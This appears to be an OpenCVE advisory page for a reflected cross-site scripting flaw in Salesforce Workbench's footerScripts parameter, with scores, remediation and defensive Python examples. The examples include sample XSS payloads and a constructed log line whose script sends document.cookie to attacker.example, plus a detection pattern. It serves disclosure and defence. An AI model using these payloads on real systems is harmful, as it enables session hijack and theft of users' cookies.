Description
Workbench is a suite of tools for administrators and developers to interact with Salesforce.com organizations via the Force.com APIs. Prior to 65.0.0, Workbench contains a reflected cross-site scripting vulnerability via the footerScripts parameter, which does not sanitize user-supplied input before rendering it in the page response. Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Workbench allows XSS Targeting Error Pages. This vulnerability is fixed in 65.0.0.
Published: 2026-04-06
Score: 5.1 Medium
EPSS: < 1% Very Low
KEV: No
Impact: Reflected cross-site scripting enabling session hijack
Action: Patch
AI Analysis

Impact

Workbench, a PHP web tool for working with Salesforce.com organizations through the Force.com APIs, has a reflected XSS flaw in footer.php triggered by the footerScripts parameter. The value is written into the page response without output encoding, so an attacker can place arbitrary HTML and JavaScript in a crafted URL; the script then runs in the browser of any authenticated user who opens that URL, in the origin of the Workbench instance. From there it can read session cookies that are not marked HttpOnly or drive authenticated requests on the victim's behalf, effectively hijacking the user's session.
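To make the mechanism concrete, the following Python script is an added illustration (not Workbench's own footer.php, whose real markup and fix are not on this page): it reflects a footerScripts query value into a small page template with and without output encoding, then uses Python's HTML parser to show whether the response contains injected tags or inline event handlers. The page template, the host name workbench.example and both payloads are constructed for the example.

```python
"""Reflected XSS through a query parameter, with and without output encoding.

Added illustration only: Workbench's real footer.php is not reproduced here.
"""
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs, urlsplit

# Constructed page skeleton with a footer slot (assumption: Workbench's markup differs).
TEMPLATE = '<html><body><div id="content">...</div><footer>{footer}</footer></body></html>'
TEMPLATE_TAGS = {"html", "body", "div", "footer"}


def _footer_param(url: str) -> str:
    """Pull the footerScripts value out of a request URL (empty string if absent)."""
    return parse_qs(urlsplit(url).query).get("footerScripts", [""])[0]


def render_footer_vulnerable(url: str) -> str:
    """The pattern the advisory describes: the value is copied into the page verbatim."""
    return TEMPLATE.format(footer=_footer_param(url))


def render_footer_hardened(url: str) -> str:
    """CWE-79 fix: HTML-encode the value so the browser treats it as text, not markup."""
    return TEMPLATE.format(footer=html.escape(_footer_param(url), quote=True))


class _TagCollector(HTMLParser):
    """Record every start tag and every on*= attribute a browser would act on."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []
        self.handlers: list[str] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.handlers.extend(name for name, _ in attrs if name.startswith("on"))


def injected_markup(page: str) -> list[str]:
    """Tags outside the template plus any inline event handlers; non-empty means XSS landed."""
    parser = _TagCollector()
    parser.feed(page)
    return sorted((set(parser.tags) - TEMPLATE_TAGS) | set(parser.handlers))


# Constructed attacker URLs: a script tag, and an attribute-based payload with no <script>.
CRAFTED_URL = ("https://workbench.example/footer.php?footerScripts="
               "%3Cscript%3Ealert(document.cookie)%3C/script%3E")
IMG_URL = ("https://workbench.example/footer.php?footerScripts="
           "%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E")

if __name__ == "__main__":
    for url in (CRAFTED_URL, IMG_URL):
        print("vulnerable:", injected_markup(render_footer_vulnerable(url)))
        print("hardened:  ", injected_markup(render_footer_hardened(url)))
```

Encoding at the output point keeps the value inert whatever it contains, including payloads that never use a script tag; whether the parameter should accept caller-supplied content at all is a separate design question that the advisory does not answer.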

Affected Systems

The vulnerability affects the Workbench suite provided by forceworkbench for interacting with Salesforce.com. Versions prior to 65.0.0 are impacted. Users running any older release should treat the system as vulnerable.

Risk and Exploitability

The CVSS 4.0 base score of 5.1 (AV:N/AC:L/AT:N/PR:N/UI:A) places this at medium severity; the CVSS 3.1 vector recorded in the history scores it 6.1. The EPSS score is below 1%, the issue is not listed in KEV, and the SSVC assessment records Exploitation: none, so no exploitation in the wild is reported. The attack needs no privileges but does need active user interaction: the victim, already authenticated to Workbench, must open a link carrying a crafted footerScripts value. Once executed, the injected script runs with the victim's session, allowing session hijack and further actions through the Workbench instance.

Generated by OpenCVE AI on April 14, 2026 at 21:46 UTC.

Remediation

Fixed in Workbench 65.0.0, as stated in the description; no separate workaround is published by the vendor.

OpenCVE Recommended Actions

  • Upgrade Workbench to version 65.0.0 or later, where the footerScripts input is properly sanitized.
  • Verify the upgrade has been applied on all instances of the tool.
  • If an upgrade cannot be performed immediately, limit the use of high‑privilege accounts when using the vulnerable version and avoid clicking suspicious links.
  • Consider implementing web application firewall rules to block or sanitize the footerScripts parameter.
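For the detection and WAF points in the list above, here is an added Python example (not OpenCVE's or the Workbench project's code) that scans web-server access logs in the common "combined" format for requests carrying a markup-like footerScripts value, percent-decoding twice so a double-encoded payload is caught. The log lines are constructed: the IP addresses are documentation ranges, and every path except footer.php is made up.

```python
"""Scan access logs for reflected-XSS attempts against the footerScripts parameter.

Added example, not OpenCVE's or Workbench's code. The log lines below are constructed.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" format: ip ident user [time] "METHOD target PROTO" status ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Markup or script-ish content that has no business in a footer parameter.
SUSPICIOUS = re.compile(r"<\s*[a-z!/]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)

# Constructed sample (documentation IP ranges; only footer.php comes from the advisory).
SAMPLE_LOG = """\
203.0.113.7 - - [06/Apr/2026:10:01:13 +0000] "GET /footer.php?footerScripts=%3Cscript%3Efetch('https://attacker.example/?c='%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.4 - - [06/Apr/2026:10:02:40 +0000] "GET /index.php HTTP/1.1" 200 8870 "-" "Mozilla/5.0"
203.0.113.7 - - [06/Apr/2026:10:03:02 +0000] "GET /footer.php?footerScripts=%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2300 "-" "Mozilla/5.0"
192.0.2.9 - - [06/Apr/2026:10:04:55 +0000] "GET /footer.php?footerScripts=analytics HTTP/1.1" 200 2290 "-" "Mozilla/5.0"
"""


def footer_scripts_values(target: str) -> list[str]:
    """Every footerScripts value in the request target, percent-decoded a second time so a
    double-encoded payload (%253C -> %3C -> <) is seen the way the page would render it."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    return [unquote(v) for v in qs.get("footerScripts", [])]


def find_xss_attempts(log_text: str) -> list[tuple[str, str, str]]:
    """Return (client_ip, timestamp, decoded_value) for each request whose footerScripts
    value looks like markup or script. Lines that do not parse as combined format are skipped."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        for value in footer_scripts_values(m.group("target")):
            if SUSPICIOUS.search(value):
                hits.append((m.group("ip"), m.group("ts"), value))
    return hits


if __name__ == "__main__":
    for ip, ts, value in find_xss_attempts(SAMPLE_LOG):
        print(f"{ts} {ip} footerScripts={value!r}")
```

A hit with a 200 status on an instance below 65.0.0 means the payload was reflected to whoever opened the link. The same SUSPICIOUS condition, applied to the decoded parameter, is what a WAF rule for this parameter would check; note that access logs only show the query string, so a rule at the WAF sees the request before any page-side decoding and should decode the same way.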


Advisories

No advisories yet.

History

Tue, 14 Apr 2026 20:30:00 +0000

  Values added:
    First Time appeared: Salesforce; Salesforce workbench
    CPEs: cpe:2.3:a:salesforce:workbench:*:*:*:*:*:*:*:*
    Vendors & Products: Salesforce; Salesforce workbench

Tue, 07 Apr 2026 15:15:00 +0000

  Values added:
    Metrics (cvssV3_1): {'score': 6.1, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}
    Metrics (ssvc): {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 07 Apr 2026 00:00:00 +0000

  Values added:
    First Time appeared: Forceworkbench; Forceworkbench forceworkbench
    Vendors & Products: Forceworkbench; Forceworkbench forceworkbench

Mon, 06 Apr 2026 16:45:00 +0000

  Values added:
    Description: Workbench is a suite of tools for administrators and developers to interact with Salesforce.com organizations via the Force.com APIs. Prior to 65.0.0, Workbench contains a reflected cross-site scripting vulnerability via the footerScripts parameter, which does not sanitize user-supplied input before rendering it in the page response. Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Workbench allows XSS Targeting Error Pages. This vulnerability is fixed in 65.0.0.
    Title: Reflected XSS in footer.php in Workbench Allows Attackers to Hijack Authenticated Sessions
    Weaknesses: CWE-79
    References:
    Metrics (cvssV4_0): {'score': 5.1, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N'}


MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-04-07T14:18:59.617Z

Reserved: 2026-03-31T17:27:08.661Z

Link: CVE-2026-34951

Vulnrichment

Updated: 2026-04-07T14:18:48.440Z

NVD

Status: Analyzed

Published: 2026-04-06T16:16:38.170

Modified: 2026-04-14T20:28:26.730

Link: CVE-2026-34951

Redhat

No data.

OpenCVE Enrichment

Updated: 2026-04-15T16:30:09Z

Weaknesses